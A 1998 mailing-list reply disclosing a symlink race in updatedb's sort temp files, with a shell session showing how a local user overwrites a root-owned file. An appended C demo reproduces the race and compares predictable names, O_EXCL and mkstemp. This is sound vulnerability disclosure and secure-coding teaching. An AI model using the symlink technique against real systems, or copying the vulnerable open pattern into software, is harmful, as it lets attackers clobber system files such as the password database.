
Re: overwrite any file with updatedb



This message is crossposted to the Bugtraq and debian-devel mailing lists.
Please post replies to the relevant list(s) only.

On Mon, 2 Mar 1998, Bryan Andregg wrote:

> On Sun, 1 Mar 1998 22:44:11 -0500, Cain wrote:
> 
> >If this is already known, my apologies. It seemed very strange that this
> >worked, so I thought it would be mentionable.
> >
> >On many Linux systems (Red Hat in particular) updatedb is run nightly
> >around 1:00. When it sorts the files that find gets, it creates a few files
> >in /tmp called sort0<pid>000{1,2,etc}. Each is around 512k. The
> >first file is created and filled, then if necessary, another is created
> >and so on until it has your whole filesystem into a nice database. Well,
> >once the first file is created you can easily guess what the next filename
> >will be called as only the last character will change. If you create a
> >link to say, the shadow password file, updatedb will kindly overwrite it
> >for you. Ex:
> 
> It should be pointed out that on Red Hat 4.2 and 5.0 updatedb runs as user
> nobody by default.
> 
> This is not a security issue unless you are running a distribution at least a
> year old.
> 
> We will be checking for the proper use of temp files in the source also.

I don't have a Red Hat system at hand to test this, so let me tell you
what it's like on a Debian pre-2.0 system, which I am currently using.

On my system, this bug is present.

Daily, cron runs "run-parts /etc/cron.daily" as root. In this directory is
a file named "find" with these contents:

----begin----
#! /bin/sh
#
# cron script to update the `find.codes' database.
#
# Written by Ian A. Murdock <imurdock@debian.org> and 
#            Kevin Dalley <kevin@aimnet.com>

if [ -f /etc/updatedb.conf ]; then
  . /etc/updatedb.conf
fi

cd / && updatedb --localuser=nobody 2>/dev/null
----end----

/usr/bin/updatedb is a bash script which calls sort to sort the file
lists. Thus, sort runs as root.

This makes the whole thing easy to exploit (things between dashes are
comments):

# touch /root/testfile
# ls -l /root/testfile
-rw-r--r--   1 root     root            0 Mar  3 10:16 /root/testfile
# /etc/cron.daily/find

-- other xterm --

$ cd /tmp
$ ls
sort1636700000
$ ln -s /root/testfile sort1636700002

-- wait a while --

$ ls
sort1636700000  sort1636700001  sort1636700002  sort1636700003

-- other xterm --

# ls -l /root/testfile
-rw-r--r--   1 root     root       524275 Mar  3 10:27 /root/bla

-- end of session --

I think the only way to really fix this is to patch sort, so that it
doesn't create files with easy-to-predict names. See "man 3 tmpfile" for a
good hint on this.

Remco Blaakmeer
Owner of a Debian GNU/Linux system
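The session above shows the race from the outside. The following is an added example, not code from the thread or from GNU sort or Debian: a small C program that reproduces the bug in a private scratch directory and contrasts three ways a temp file can be created. The "sort<pid>00002" name, the "shadow" victim file and its contents are constructed for the demo; the same process plays both the attacker (planting the symlink) and the privileged writer (creating the chunk file), which is enough to show why the file gets overwritten and which fix stops it.

```c
/* Added example: predictable temp names + O_TRUNC let a pre-planted symlink
 * redirect a privileged writer; O_EXCL refuses to follow it, and mkstemp()
 * removes the guessable name altogether. All paths/contents are constructed. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum mode { MODE_PREDICTABLE, MODE_EXCL, MODE_MKSTEMP };

/* Vulnerable: deterministic name, O_CREAT|O_TRUNC, no O_EXCL. If someone
 * already planted a symlink at that name, open() follows it and truncates
 * the target. This is the sort(1) behaviour the thread describes. */
static int open_predictable(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Partial fix: same predictable name, but O_EXCL makes open() fail with
 * EEXIST if anything (a symlink included) already exists at the path. */
static int open_excl(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Proper fix: mkstemp() replaces the XXXXXX with an unpredictable suffix
 * and opens with O_CREAT|O_EXCL, so the name cannot be planted in advance.
 * The chosen path is written back into tmpl. */
static int open_mkstemp(char *tmpl)
{
    return mkstemp(tmpl);
}

/* Simulate the race: create a "victim" file, let the attacker predict the
 * next temp name and symlink it to the victim, then run the "privileged"
 * writer. Returns 1 if the victim was overwritten, 0 if it survived,
 * -1 on setup failure. */
static int victim_clobbered(enum mode m)
{
    char dir[] = "/tmp/sortdemoXXXXXX";          /* private, non-sticky dir */
    if (mkdtemp(dir) == NULL) return -1;

    char victim[PATH_MAX], planted[PATH_MAX], tmpl[PATH_MAX];
    const char secret[] = "root:secret\n";        /* constructed contents */
    snprintf(victim, sizeof victim, "%s/shadow", dir);
    int fd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0 || write(fd, secret, strlen(secret)) != (ssize_t)strlen(secret))
        return -1;
    close(fd);

    /* Attacker: saw sort<pid>00001 appear, guesses sort<pid>00002 is next. */
    snprintf(planted, sizeof planted, "%s/sort%d00002", dir, (int)getpid());
    if (symlink(victim, planted) != 0) return -1;

    /* Privileged writer creates its next chunk file. */
    int out = -1;
    switch (m) {
    case MODE_PREDICTABLE: out = open_predictable(planted); break;
    case MODE_EXCL:        out = open_excl(planted); break;   /* -1, EEXIST */
    case MODE_MKSTEMP:
        snprintf(tmpl, sizeof tmpl, "%s/sortXXXXXX", dir);
        out = open_mkstemp(tmpl);
        break;
    }
    if (out >= 0) {
        const char chunk[] = "sorted chunk\n";
        ssize_t n = write(out, chunk, strlen(chunk));
        (void)n;
        close(out);
    }

    struct stat st;
    int clobbered = (stat(victim, &st) == 0 && st.st_size != (off_t)strlen(secret));

    /* Clean up the scratch directory. */
    if (m == MODE_MKSTEMP && out >= 0) unlink(tmpl);
    unlink(planted);
    unlink(victim);
    rmdir(dir);
    return clobbered;
}

int main(void)
{
    printf("predictable name, O_TRUNC: victim overwritten = %d\n", victim_clobbered(MODE_PREDICTABLE));
    printf("predictable name, O_EXCL : victim overwritten = %d\n", victim_clobbered(MODE_EXCL));
    printf("mkstemp()                : victim overwritten = %d\n", victim_clobbered(MODE_MKSTEMP));
    return 0;
}
```

The O_EXCL variant shows that the overwrite is really a combination of two defects: a guessable name and an open() that will happily follow whatever is already there. O_EXCL alone stops the overwrite but turns the attack into a denial of service (the privileged job fails with EEXIST), which is why mkstemp(), with a name the attacker cannot predict, is the fix worth patching into sort.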

